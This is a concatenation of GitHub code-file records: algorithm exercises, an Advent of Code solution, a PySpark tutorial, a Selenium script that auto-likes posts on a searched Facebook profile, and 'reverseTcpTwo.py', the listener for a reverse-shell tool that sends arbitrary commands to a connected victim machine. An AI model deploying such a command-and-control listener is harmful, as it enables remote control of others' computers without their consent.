random\nimport math\nimport time\ninput = sys.stdin.readline\n\n\ndef solution(array):\n array.sort()\n # 그룹의 인원수와 공포도가 맞아 떨어지면 그룹 수 증가\n # 1/1 2/1 2 \n # 1 2 2 2 3\n\n cnt = 1\n group = 0\n for i in array:\n if cnt == i:\n group += 1\n cnt = 1\n else: cnt += 1\n return group\n\n\nn = int(input())\narray = list(map(int, input().split(\" \")))\nprint(solution(array))\n\n\n# 시간초과 확인 방법\n# time 라이브러리\n# start = time.time()\n\n# #logic\n# array = []\n# # random 라이브러리\n# for i in range(100000):\n# array.append(random.randrange(1,100000))\n# solution(array)\n\n# end = time.time()\n# print(f\"{end - start:.5f} sec\")\n# print(round(end-start,5))\n\n","repo_name":"sujin-park0607/PythonBook","sub_path":"ch03_그리디/실전 문제/sujin/greedy/11-1.py","file_name":"11-1.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"17526329951","text":"import re\n\nwith open(\"input.txt\") as fp:\n lines = fp.readlines()\n\nif __name__ == \"__main__\":\n possible_allergies = {}\n all_ingredients = set()\n for line in lines:\n ingredients, allergies = line.strip().strip(\")\").split(\" (contains \")\n ingredients = set(ingredients.split(\" \"))\n all_ingredients = all_ingredients.union(ingredients)\n for allergen in allergies.split(\", \"):\n if allergen in possible_allergies:\n possible_allergies[allergen] = possible_allergies[allergen].intersection(ingredients)\n else:\n possible_allergies[allergen] = ingredients\n allergens = {}\n while len(allergens) < len(possible_allergies):\n for allergen, ingredient_set in possible_allergies.items():\n if len(ingredient_set) == 1:\n for ingredient in ingredient_set:\n break\n allergens[allergen] = ingredient\n for other in possible_allergies:\n if ingredient in possible_allergies[other]:\n possible_allergies[other].remove(ingredient)\n safe = all_ingredients.difference(allergens.values())\n\n with open(\"input.txt\") as fp:\n text = fp.read()\n safe_count = sum(len(re.findall(rf\"\\b{ingredient}\\b\", text)) for ingredient in safe)\n print(safe_count)\n print(f\"Part 2: {','.join(allergens[k] for k in sorted(allergens))}\")\n","repo_name":"Joshua-Tustanowski/advent-of-code","sub_path":"Josh/solutions_2020/day_20/20.py","file_name":"20.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"3824397964","text":"def solution(n):\n dx = [1, 0, -1]\n dy = [0, 1, -1]\n board = [[0] * n for _ in range(n)]\n\n x = 0\n y = 0\n angle = 0 # 3개의 방향 각도, 0 으로 설정해서 아래 방향부터 채운다.\n count = 1\n board_size_by_filled = n * (n + 1) // 2\n\n while count <= board_size_by_filled:\n board[x][y] = count\n\n # 현재 방향에 더 채울 칸이 있다면 각도는 그대로 냅두고 x, y 를 방향에 맞춰 갱신한다.\n nx = dx[angle] + x\n ny = dy[angle] + y\n count += 1\n\n if 0 <= nx < n and 0 <= ny < n and board[nx][ny] == 0:\n x = nx\n y = ny\n\n # 현재 방향을 다 채웠다면 각을 변경한다.\n else:\n angle = (angle + 1) % 3 # 0을 나눌 수 없으니 1 더하기\n x += dx[angle] # n = 4 대각이라면 (3,3) -> (2,2) 로 이동\n y += dy[angle]\n\n answer = []\n for i in range(len(board)):\n for j in range(len(board[i])):\n answer.append(board[i][j])\n\n return answer\n\nprint(solution(4))","repo_name":"juni8453/python_practice","sub_path":" problem_solving_strategy/matrix/삼각_달팽이.py","file_name":"삼각_달팽이.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"35054001290","text":"import numpy as np\nimport bines2 as bines \n\ndef am(m,x,y,nbin, modo):\n rcil = np.sqrt(x**2 + y**2)\n rbin, nodos = bines.rbin1(rcil, nbin)\n \n Amv = np.ndarray(nbin)\n phiv = np.ndarray(nbin)\n \n n = len(x)\n delta = n / nbin\n \n r_sort = np.sort(rcil)\n \n for j in range(0, nbin):\n mask, = np.where((rcil > r_sort[j*(delta-1)]) & (rcil <= r_sort[(delta-1)*(j+1)]))\n \n xn = x[mask]\n yn = y[mask]\n \n titaj = np.arctan2(yn,xn)\n \n a0 = np.sum(m[mask])\n am = np.sum(m[mask]*np.cos(modo*titaj))\n bm = np.sum(m[mask]*np.sin(modo*titaj))\n \n Amv[j] = np.sqrt(am**2 + bm**2) / a0\n phiv[j] = np.arctan2(bm,am) / 2.\n \n\n return Amv, phiv, rbin\n\n\n","repo_name":"ornemarioni/Barras_GdGs","sub_path":"Barras_Gd/programs/furier_components.py","file_name":"furier_components.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"71915659938","text":"\nimport socket,subprocess as sp ,sys,os\nfrom colorama import Fore,Style\n\n\ndef recv_data(connection):\n response = connection.recv(1024)\n total_size = long(response[:16])\n response = response[16:]\n while total_size > len(response): #start loop\n data = connection.recv(1024) #to receive the remaining data\n response += data #output exceeds 1024 \n print (Fore.BLUE + \"%s\" %response)\n print(Fore.RESET)\n\ndef send_data(connection,data):\n data = data.encode('utf-8')\n try:\n connection.send(data)\n recv_data(connection)\n except socket.error as e :\n print(Fore.RED + \"[-] Unable to send data\" + Fore.RESET)\n\ndef console(connection, ip,port):\n print (Fore.GREEN + \"[Info]\" + Fore.RESET ),\n print(Fore.BLUE + \" Connection Established from: %s:%s \" %(ip,port))\n print( Fore.RESET)\n\n connection.send(\"uname -a\")\n sysinfo = connection.recv(1024).split(\" \")\n print (Fore.GREEN + \"Operating System :\" + Fore.RESET ),\n print(Fore.BLUE + \"%s\" % sysinfo[0])\n print( Fore.RESET)\n print (Fore.GREEN + \"Node Name :\" + Fore.RESET ),\n print(Fore.BLUE + \"%s\" % sysinfo[1])\n print( Fore.RESET)\n print (Fore.GREEN + \"Release :\" + Fore.RESET ),\n print(Fore.BLUE + \"%s\" %sysinfo[2])\n print( Fore.RESET)\n print (Fore.GREEN + \"Version :\" + Fore.RESET ),\n print(Fore.BLUE + \"%s %s %s %s %s\" % (sysinfo[3],sysinfo[4],sysinfo[5],sysinfo[6],sysinfo[7]))\n print( Fore.RESET)\n print (Fore.GREEN + \"Machine :\" + Fore.RESET ),\n print(Fore.BLUE + \"%s\" % sysinfo[8])\n print( Fore.RESET)\n\n user = sysinfo[1] +'@'+ip\n while 1 : #Run a while loop to inintiate the reverse connection \n command = raw_input(Fore.RED + '%s >' %user ) #Command to enter on server \n print( Fore.RESET)\n if command != \"exit()\" : #if command is not exit(), execute\n if command != \"\" : #continue command is empty ,loop function ******made changes here*******\n response = send_data(connection, command)\n print (\"%s\" %response)\n elif command == \"\":\n continue\n elif command == \"cls\":\n dp = os.system(\"clear\")\n elif command == \"exit()\":\n connection.send(\"exit\")\n print (Fore.BLUE + \"[+] \" + Fore.RESET),\n print (Fore.GREEN + \"Shell Going Down\" + Fore.RESET)\n connection.close()\n else:\n print (Fore.RED + \"[!] UnKown command\" + Fore.RESET)\ndef banner():\n banner = '''\n373737373737373737373737373737373737373737373737373737373737373737373737373737373737373737373737\n7 3\n3 ## ####### # # # 7\n7 # # # # # # 3\n3 # # # # # # | 7\n7 # # # # # # |Author:Fumbani 3\n3 ## # # # #### ####### ##### ##### # # | 7\n7 # # # # # # # # # # # # |Version:1.0 RvsShell 3\n3 # # # # #### # # # #### # # | 7\n7 # # # # # # # # # # # 3\n3 # # # #### ####### # # ##### # # 7\n7 3\n3 7\n737373737373737373737373737373737373737373737373737373737373737373737373737373737373737373737373\n'''\n return banner\ndef main_control():\n try:\n host = sys.argv[1] #attacker's host address , usually ''\n port = int (sys.argv[2]) #attacker's host port\n except Exception as e :\n print (Fore.RED + \"[-] Socket Information Not Provided\" + Fore.RESET)\n sys.exit(1)\n print (Fore.GREEN + \"[*]\" + Fore.RESET ),\n print (Fore.BLUE + \" Framework Started Successfully \" + Fore.RESET)\n print (Fore.CYAN)\n #print(banner()) uncomment this line to print the banner\n print (Fore.RESET)\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #setup socket\n\n s.bind((host,port)) #Bind the socket\n s.listen(5) #Max coonections: 5\n\n if host == \"\":\n host = \"localhost\"\n\n print(Fore.GREEN + \"[*]\" + Fore.RESET),\n print(Fore.BLUE + \"Listening on %s:%d ... \" %(host,port))\n print(Fore.RESET)\n try:\n conn,addr = s.accept()\n\n sysi = conn.recv(2048).split(\",\")\n \n except KeyboardInterrupt:\n print(Fore.RED + \"[-] User Requested An Interrupt\" + Fore.RESET)\n sys.exit(0)\n\n console(conn,str(addr[0]),str(addr[1]))\n\nif __name__ == '__main__':\n main_control()\n","repo_name":"deadex-ng/pythonReverseShell-oneClient","sub_path":"reverseTcpTwo.py","file_name":"reverseTcpTwo.py","file_ext":"py","file_size_in_byte":5009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"40718428443","text":"import pynecone as pc\n\n# openai.api_key = \"YOUR_API_KEY\"\n\nclass State(pc.State):\n pass\n\ndef index():\n return pc.center(\n pc.vstack(\n pc.heading(\"Blade\", font_size=\"1.5em\"),\n pc.input(placeholder=\"Sample Input\"),\n pc.button(\n pc.icon(tag=\"MoonIcon\"),\n on_click=pc.toggle_color_mode,\n ),\n pc.divider(),\n padding=\"2em\",\n shadow=\"lg\",\n border_radius=\"lg\",\n ),\n width=\"100%\",\n height=\"100vh\",\n font_family=\"Inter\",\n bg=\"radial-gradient(circle at 22% 11%,rgba(62, 180, 137,.20),hsla(0,0%,100%,0) 19%)\",\n )\n\n# Add state and page to the app.\napp = pc.App(state=State)\napp.add_page(index, title=\"Pynecone:Blade\")\napp.compile()","repo_name":"afk-echo/blade-cc","sub_path":"Blade_Web/Blade_Web.py","file_name":"Blade_Web.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"13321962175","text":"import numpy\nimport time\nimport os\n\n\nclass CG:\n def __init__(self, x=25, y=25, bgchar=\"-\"):\n \"\"\"A Basic implementation of Pixels on screen in\n simple array format to try somebasic computer graphics algorithms\n\n Parameters:\n -----------\n x: (int) Maximum x coordinate\n y: (int) Maximum y coordinate\n bgchar: (str) A char to fill the background\"\"\"\n\n self.width = x\n self.height = y\n self.pixelmatrix = numpy.full((y, x), bgchar)\n\n def putpixel(self, x, y, putchar=\"@\"):\n \"\"\"Puts a char at the given x y coordinate\n\n Parameters:\n -----------\n x: (int) x coordinate of pixel\n y: (int) y coordinate of pixel\n putchar: (str) A char to put at that pixel\n take_origin: (bool) translate origin to center of the window\n \"\"\"\n try:\n self.pixelmatrix[y][x] = putchar\n except:\n print(\"Error!\")\n\n def getpixel(self, x, y):\n \"\"\"Gets a char at the given x y coordinate\n\n Parameters:\n -----------\n x: (int) x coordinate of pixel\n y: (int) y coordinate of pixel\n \"\"\"\n try:\n return self.pixelmatrix[y][x]\n except:\n print(\"Error!\")\n\n def show(self):\n \"\"\"Shows the Pixel Matrix\"\"\"\n for i in self.pixelmatrix:\n for j in i:\n print(j, end=\"\")\n print()\n\n def run(self, speed=0.25):\n \"\"\"Loops the Pixel Matrix by some delay\n\n Parameters:\n -----------\n speed: (float) delay between the showing the pixel matrix\"\"\"\n\n os.system(\"clear\")\n self.show()\n time.sleep(speed)\n","repo_name":"ganimtron-10/ComputerPyGraphics","sub_path":"ComputerPyGraphics.py","file_name":"ComputerPyGraphics.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"20277312122","text":"'''Defines a policy that calculates a control signal from an image.\n'''\n\nfrom cnn import create_cnn, calculate_cnn_output\nfrom nn_utilities import update_model_weights\nfrom rnn import create_rnn, calculate_rnn_output\n\n\nclass CNNRNNPolicy(object):\n def __init__(self, cnn_weights=None):\n # Create the ConvNet and load the pretrained weights if provided\n self.cnn = create_cnn()\n if cnn_weights is not None:\n update_model_weights(self.cnn, cnn_weights)\n # Create the RNN\n self.rnn = create_rnn()\n\n def rnn_output(self, percept):\n # Feed the image through the ConvNet to get a low dimensional feature\n # vector. Returns a vector in R3 for use in control.\n feature_vector = calculate_cnn_output(self.cnn,\n percept.reshape(1, 1, 64, 64))\n\n # Feed the feature vector into the RNN and compute a control signal\n # from its output\n rnn_out = calculate_rnn_output(self.rnn,\n feature_vector.reshape(1, 1, 3))\n\n return rnn_out\n\n def control_signal(self, rnn_out):\n \"\"\"\n Given an output from the RNN calculate the control signals:\n acceleration/braking and turn angle\n\n Let rnn_output = [o1, o2, o3]. Then, we calculate:\n\n signal_steering = (o1 + o2) / 2\n Between -1 (full left) and +1 (full right)\n\n signal_acceleration = o3\n Between -1 (full brake) and +1 (full throttle)\n\n Returns a pair: signal_steering, signal_acceleration\n \"\"\"\n signal_steering = (rnn_out[0] + rnn_out[1]) / 2\n signal_acceleration = rnn_out[2]\n\n # Restrict steering to the range [-1, 1]\n if signal_steering < -1:\n signal_steering = -1\n elif signal_steering > 1:\n signal_steering = 1\n\n # Restrict acceleration to the range [0, 1]\n if signal_acceleration < 0:\n signal_acceleration = 0\n elif signal_acceleration > 1:\n signal_acceleration = 1\n\n return signal_steering, signal_acceleration\n","repo_name":"cosmoharrigan/neuroevolution","sub_path":"neuroevolution/policy.py","file_name":"policy.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"34"} +{"seq_id":"23103595681","text":"# !/user/bin/env python3\n\n# Created by Trent Hodgins\n# Created on 10/06/2021\n# This is teh RGB program\n# It goes through all the RGB clolors\n\n\ndef main():\n # this function does addition math\n\n # process and output\n counter1 = 0\n counter2 = 0\n counter3 = 0\n\n for counter1 in range(256):\n for counter2 in range(256):\n for counter3 in range(256):\n print(\"RGB({0},{1},{2}\".format(counter1, counter2, counter3))\n\n print(\"\\nDone\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"trent-hodgins-01/ICS3U-Unit4-06-Python","sub_path":"RGB.py","file_name":"RGB.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"38543560748","text":"\r\n# PLEASE NOTE THAT AUTOMATION CONTAIN TAG FETCHING, IF RESPECTIVE SITE MAKE CHANGE THEN ONE HAVE TO CHANGE CODE \r\n# UPLOADING DATE:28-04-2020\r\nfrom selenium import webdriver\r\n# from selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\n# from selenium.webdriver.support import expected_conditions as EC\r\n# from selenium.common.exceptions import TimeoutException\r\nfrom selenium.webdriver.remote.webelement import WebElement\r\nimport time\r\nfrom selenium.webdriver.common.action_chains import ActionChains\r\nimport sys\r\nsearch_name=\"nirmal patel\" #default name in case one forgot to enter name\r\ntry:\r\n\tserach_name=''.join(sys.argv[1:])\r\nexcept:\r\n\tprint(\"name required to search\")\r\n\r\ndef page_unlike():\r\n\tbrowser.find_element_by_xpath('//*[@data-click=\"home_icon\"]').click()\t#Home button xpath and click.\r\n\ttime.sleep(1)\r\n\tbrowser.find_element_by_xpath('//*[@title=\"Pages\"]').click()\r\n\ttime.sleep(2)\r\n\tbrowser.find_element_by_xpath('//*[@role=\"tablist\"]/li[3]/a').click()\r\n\ttime.sleep(2)\r\n\tpages=browser.find_elements_by_xpath('//*[@id=\"all_liked_pages\"]/div/div')\r\n\tfor page in pages:\r\n\t\tpage.find_element_by_xpath('./div/div/div[2]/div/button').click()\r\n\r\n\r\ntemp=time.time()\r\nchrome_options = webdriver.ChromeOptions()\r\nprefs = {\"profile.default_content_setting_values.notifications\" : 2}\r\nchrome_options.add_experimental_option(\"prefs\",prefs)\r\nbrowser= webdriver.Chrome(options=chrome_options,executable_path=r\"C:\\Program Files\\Python37\\chromedriver\")\r\nbrowser.maximize_window()\r\n\r\nbrowser.get(\"https://en-gb.facebook.com/login/\")\r\n# username\r\nbrowser.find_element_by_xpath('//*[@id=\"email\"]').send_keys('USERNAME HERE')\r\ntime.sleep(1)\r\n# password\r\nbrowser.find_element_by_xpath('//*[@id=\"pass\"]').send_keys('paSSWORD HERE')\r\ntime.sleep(1)\r\n# login click()\r\nbrowser.find_element_by_xpath('//*[@id=\"loginbutton\"]').click()\r\ntime.sleep(1)\r\n# type name to search\r\nbrowser.find_element_by_xpath('//input[@name=\"q\"]').send_keys(search_name)\r\n# click search\r\nbrowser.find_element_by_xpath('//button[@data-testid=\"facebar_search_button\"]').click()\r\ntime.sleep(5)\r\n\r\nmain_div=browser.find_element_by_xpath('//div[@class=\"_6rbb\"]')\r\nprint(main_div)\r\ndivs=main_div.find_elements_by_xpath('./div')\r\nprint(divs)\r\nnirmal_profile=divs[0].find_element_by_xpath('./div/div/div/div/div/div/div/a').get_attribute('href')\r\ntime.sleep(1)\r\nbrowser.get(nirmal_profile)\r\ntime.sleep(5)\r\nbrowser.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\r\ntime.sleep(1)\r\nbrowser.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\r\ntime.sleep(3)\r\ntimeline=browser.find_elements_by_xpath('//div[@class=\"rq0escxv l9j0dhe7 du4w35lb d2edcug0 gile2uim buofh1pr g5gj957u hpfvmrgz aov4n071 oi9244e8 bi6gxh9e h676nmdw\"]/div')\r\ntimeline.pop(0)\r\nbrowser.execute_script(\"window.scrollTo(0,0);\")\r\nprint(len(timeline),type(timeline))\r\n\r\nfor post in timeline:\r\n\ttry:\r\n\t\tif post.find_element_by_xpath('./div/div/div/div[2]/div/div[4]/div[1]/div/div/span[1]/div/div/div').get_attribute('aria-label')=='Like':\r\n\t\t\taction = ActionChains(browser)\r\n\t\t\thover=post.find_element_by_xpath('./div/div/div/div[2]/div/div[4]/div[1]/div/div/span[1]/div/div/div')\r\n\t\t\t# //div[@aria-label=\"Reactions\"]')\r\n\t\t\taction.move_to_element(hover).perform()\r\n\t\t\ttime.sleep(0.7)\r\n\t\t\thover.click()\r\n\t\t\ttime.sleep(1)\r\n\t\telse:\r\n\t\t\tprint('already liked')\r\n\texcept:\r\n\t\tprint(\"exception in like\")\r\n\t\r\n\t\r\n\r\npage_unlike()\r\nprint(\"time taken:\",time.time()-temp)\r\n\r\n\r\n\r\n\r\n","repo_name":"nicpatel963/Facebook-Automation","sub_path":"facebook_auto_like.py","file_name":"facebook_auto_like.py","file_ext":"py","file_size_in_byte":3459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"508561430","text":"from bpy.utils import register_class, unregister_class\nfrom bpy.types import Scene, Object, Material, PropertyGroup\nfrom bpy.props import StringProperty, EnumProperty, FloatProperty, IntProperty, PointerProperty, BoolProperty\n\n# --- --- --- --- ---\n\ndef BM_setUshort(self, value):\n self = max(0, min(value, 65536));\n\n# --- --- --- --- ---\n\nBM_Classes = [\n (\"static\", \"Static\", \"Terrain, building or background prop\"),\n (\"actor\", \"Actor\", \"Player or NPC\"),\n (\"arma\", \"Armature\", \"Custom armature logic\"),\n ];\n\nBM_ObjectAttrs = [\n [\"meshid\", IntProperty,\n {\"name\":\"Mesh Nº\", \"default\":0,\n \"description\":\"Object's position in the mesh archive.\"\n + \" May not be higher than 255 or the archive's element count\"}],\n\n [\"kls\", EnumProperty,\n {\"items\":BM_Classes, \"name\":\"Type\",\n \"description\":\"Class mutation to be applied ingame\"}],\n\n [\"displayName\", StringProperty,\n {\"name\":\"Name\", \"default\":\"Object\",\n \"description\":\"Non-unique name to be displayed ingame. Can be left blank\"}],\n \n [\"weight\", FloatProperty,\n {\"name\":\"Weight\", \"default\":1.0,\n \"description\":\"Multiplier used by custom physics\"}]\n ];\n\nstatic_attrs = [\"displayName\", \"weight\"];\n\n# --- --- --- --- ---\n\nclass BM_ObjectSettings(PropertyGroup):\n\n arc_offset = IntProperty (name = \"\", default = 0, min = 0, max = 255,\n description = \"DAF file mesh slot\" );\n\n# --- --- --- --- ---\n\nclass BM_SceneSettings(PropertyGroup):\n\n resourceID = IntProperty (name = \"ResourceID\", default = 0, min = 0, max = 65535,\n description = \"ID of the resource this object belongs to;\"\n + \" used as index into a BM_Resource array\" );\n\n mesharch = StringProperty (name = \"MeshArchive\", default = \"M000\",\n description = \"Name of DAF mesh file to write to\" );\n\n texarch = StringProperty (name = \"MateArchive\", default = \"T000\",\n description = \"Name of DAF material file to write to\" );\n\n curmat = PointerProperty(name = \"\", type = Material,\n description = \"Selected material for adjusting settings & exporting\");\n\n curobj = PointerProperty(name = \"\", type = Object,\n description = \"Selected object for adjusting settings & exporting\" );\n\n# --- --- --- --- ---\n\nBM_MaterialPresets = [\n (\"default\", \"Default\", \"Specular, opaque, no faux reflections\" ),\n (\"glass\", \"Glass\", \"Specular, transparency, faux reflections\" ),\n (\"glow\", \"Glow\", \"No specular, transparency, radiance\" ),\n\n (\"metalness\", \"Metalness\", \"Specular, opaque, faux reflections\" ),\n (\"metalglass\", \"MetalGlass\", \"Uses glowmap to combine glass and metalness\" ),\n (\"metalglow\", \"MetalGlow\", \"Uses glowmap to combine glow and metalness\" ),\n\n (\"sprite\", \"Sprite\", \"Cam-aligned plane, has animations\" ),\n (\"billboard\", \"Billboard\", \"Cam-aligned plane, no animations\" ),\n ];\n\nBM_MaterialFlags = { \n \"Specular\" : 0x01,\n \"Opaque\" : 0x02,\n \"Reflective\" : 0x04,\n \"Metallic\" : 0x08,\n \"Radiance\" : 0x10,\n \"Animated\" : 0x20,\n \"Sprite\" : 0x40,\n \"NonMat\" : 0x80\n };\n\ndef BM_Material_onPresetChange(self, context):\n\n scene = context.scene;\n mate = scene.BlackMagic.curmat;\n\n newkls = mate.BlackMagic.preset;\n\n if newkls in [\"default\", \"glass\", \"metalness\", \"metalglass\", \"metalglow\", \"billboard\", \"sprite\"]:\n\n mate.BlackMagic.num_textures = 3;\n\n if newkls == \"default\" :\n mate.BlackMagic.shader = 0;\n mate.BlackMagic.flags = (BM_MaterialFlags[\"Specular\" ]\n | BM_MaterialFlags[\"Opaque\" ]);\n\n elif newkls == \"glass\" :\n mate.BlackMagic.shader = 1;\n mate.BlackMagic.flags = (BM_MaterialFlags[\"Specular\" ]\n | BM_MaterialFlags[\"Reflective\"]);\n\n elif newkls == \"metalness\" :\n mate.BlackMagic.shader = 2;\n mate.BlackMagic.flags = (BM_MaterialFlags[\"Specular\" ]\n | BM_MaterialFlags[\"Opaque\" ]\n | BM_MaterialFlags[\"Metallic\" ]\n | BM_MaterialFlags[\"Reflective\"]);\n\n elif newkls == \"metalglass\":\n mate.BlackMagic.shader = 3;\n mate.BlackMagic.flags = (BM_MaterialFlags[\"Specular\" ]\n | BM_MaterialFlags[\"Metallic\" ]\n | BM_MaterialFlags[\"Reflective\"]);\n\n elif newkls == \"metalglow\" :\n mate.BlackMagic.shader = 4;\n mate.BlackMagic.flags = (BM_MaterialFlags[\"Specular\" ]\n | BM_MaterialFlags[\"Metallic\" ]\n | BM_MaterialFlags[\"Reflective\"]\n | BM_MaterialFlags[\"Radiance\" ]);\n\n elif newkls == \"billboard\" :\n mate.BlackMagic.shader = 5;\n mate.BlackMagic.flags = (BM_MaterialFlags[\"Specular\" ]\n | BM_MaterialFlags[\"Opaque\" ]\n | BM_MaterialFlags[\"Sprite\" ]);\n\n elif newkls == \"sprite\" :\n mate.BlackMagic.shader = 6;\n mate.BlackMagic.flags = (BM_MaterialFlags[\"Specular\" ]\n | BM_MaterialFlags[\"Opaque\" ]\n | BM_MaterialFlags[\"Sprite\" ]\n | BM_MaterialFlags[\"Animated\" ]);\n\n elif newkls == \"glow\":\n\n mate.BlackMagic.shader = 7;\n mate.BlackMagic.num_textures = 2;\n mate.BlackMagic.flags = BM_MaterialFlags[\"Radiance\"];\n\nclass BM_MaterialSettings(PropertyGroup):\n\n preset = EnumProperty (items = BM_MaterialPresets, name = \"\", default = \"default\",\n description = \"Determines SIN shader for this material & some export settings\",\n update = BM_Material_onPresetChange );\n\n num_textures = IntProperty (name = \"\", default = 3, min = 0, max = 255,\n description = \"Number of texture maps to export\" );\n\n tex_offset = IntProperty (name = \"\", default = 0, min = 0, max = 255,\n description = \"DAF file texture slot\" );\n\n mat_offset = IntProperty (name = \"\", default = 0, min = 0, max = 255,\n description = \"DAF file material slot\" );\n\n matid = IntProperty (name = \"\", default = 1, min = 1, max = 65535,\n description = \"Unique material ID (nonzero)\" );\n\n flags = IntProperty (default = BM_MaterialFlags[\"Specular\"] | BM_MaterialFlags[\"Opaque\"] );\n\n shader = IntProperty (default = 0 );\n\n spec_mult = FloatProperty(name = \"\", default = 0.65, min = 0, max = 1.49,\n description = \"Intensity factor for specular\" );\n\n diff_mult = FloatProperty(name = \"\", default = 0.50, min = 0, max = 1.49,\n description = \"Intensity factor for diffuse\" );\n\n ref_mult = FloatProperty(name = \"\", default = 0.75, min = 0, max = 1.49,\n description = \"Intensity factor for faux-reflections\" );\n\n glow_rea = FloatProperty(name = \"\", default = 2.00, min = 0, max = 8.00,\n description = \"Effective distance for the radiance effect\" );\n\n# --- --- --- --- ---\n\ndef register():\n\n Scene.BlackMagic = PointerProperty(type = BM_SceneSettings );\n Object.BlackMagic = PointerProperty(type = BM_ObjectSettings );\n Material.BlackMagic = PointerProperty(type = BM_MaterialSettings);\n\ndef unregister():\n \n del Scene.BlackMagic;\n del Object.BlackMagic;\n del Material.BlackMagic;\n\n# --- --- --- --- ---\n","repo_name":"Liebranca/DSM","sub_path":"src/BlackMagic/BM_types.py","file_name":"BM_types.py","file_ext":"py","file_size_in_byte":9667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"5341980335","text":"#!/usr/bin/python\nimport sys\nfor line in sys.stdin:\n line = line.strip()\n items = line.split(',')\n rates = items[3].strip('\" ')\n if len(rates) < 2:\n continue\n label = float(items[2])\n num = abs(int(100 * label))\n if num == 0 :\n continue\n if label > 0:\n nl = 1\n else:\n nl = -1\n rs = '%d | %s\\n'%(nl, rates)\n sys.stdout.write(rs * num)\n\n\n","repo_name":"adayone/sk","sub_path":"binary.py","file_name":"binary.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"11476116454","text":"#!/usr/bin/env python\n#-*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals, absolute_import, division, print_function\n\nRGB_MIN_VALUE = 0\nRGB_MAX_VALUE = 255\n\nGRAYSCALE_MIN_VALUE = 0\nGRAYSCALE_MAX_VALUE = 255\n\n# ν˜Έν™˜ μ„€μ •\nfrom .. import image\nimage.RGB_MIN_VALUE = RGB_MIN_VALUE\nimage.RGB_MAX_VALUE = RGB_MAX_VALUE\nimage.GRAYSCALE_MIN_VALUE = GRAYSCALE_MIN_VALUE\nimage.GRAYSCALE_MAX_VALUE = GRAYSCALE_MAX_VALUE\n","repo_name":"Thestars3/pyufp","sub_path":"ufp/_compatibleness/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"30808387832","text":"import math\nimport typing\nimport numpy as np\n\n\ndef rationalQuadratic(\n data_source: np.ndarray[np.float64],\n look_back: int,\n relative_weight: float,\n start_at_Bar: int,\n):\n yhat: typing.List[float] = []\n start_at_Bar += 1 # because this is 1 on tv: _size = array.size(array.from(_src))\n for index in range(start_at_Bar, len(data_source)):\n _currentWeight: float = 0\n _cumulativeWeight: float = 0\n for bars_back_index in range(0, start_at_Bar):\n y = data_source[index - bars_back_index]\n w = pow(\n 1\n + (\n pow(bars_back_index, 2)\n / ((pow(look_back, 2) * 2 * relative_weight))\n ),\n -relative_weight,\n )\n _currentWeight += y * w\n _cumulativeWeight += w\n yhat.append(_currentWeight / _cumulativeWeight)\n return np.array(yhat)\n\n\ndef gaussian(\n data_source: np.ndarray[np.float64], look_back: int, start_at_Bar: int\n):\n start_at_Bar += 1\n yhat: typing.List[float] = []\n for index in range(start_at_Bar, len(data_source)):\n _currentWeight: float = 0\n _cumulativeWeight: float = 0\n for bars_back_index in range(0, start_at_Bar):\n y = data_source[index - bars_back_index]\n w = math.exp(-pow(bars_back_index, 2) / (2 * pow(look_back, 2)))\n _currentWeight += y * w\n _cumulativeWeight += w\n yhat.append(_currentWeight / _cumulativeWeight)\n return np.array(yhat)","repo_name":"wesley1001/fictional-trading","sub_path":"src/trader/strategies/kernel_functions/kernel.py","file_name":"kernel.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"29012299038","text":"### Before we can write and run SQL queries, we need to tell Spark to treat the DataFrame as a SQL table\n### To register a DataFrame as a table, call the registerTempTable() method on that DataFrame object. This method requires one string parameter, name, \n### that we use to set the table name for reference in our SQL queries.\n\n\n# step1\n### Use the registerTempTable() method to register the DataFrame df as a table named census2010\n### Then, run the SQLContext method tableNames to return the list of tables.\nfrom pyspark.sql import SQLContext\nsqlCtx = SQLContext(sc)\ndf = sqlCtx.read.json(\"census_2010.json\")\ndf.registerTempTable('census2010')\ntables = sqlCtx.tableNames()\nprint(tables)\n\n# step2\n### Write a SQL query that returns the age column from the table census2010, and use the show() method to display the first 20 results.\nquery = 'SELECT age FROM census2010'\nsqlCtx.sql(query).show(20)\n\n# step3\n### The males and females columns (in that order) where age > 5 and age < 15\nquery = 'select males,females from census2010 where age > 5 and age < 15'\nsqlCtx.sql(query).show()\n\n# step4\n### Write a SQL query that returns a DataFrame containing the males and females columns from the census2010 table.\n### Use the describe() 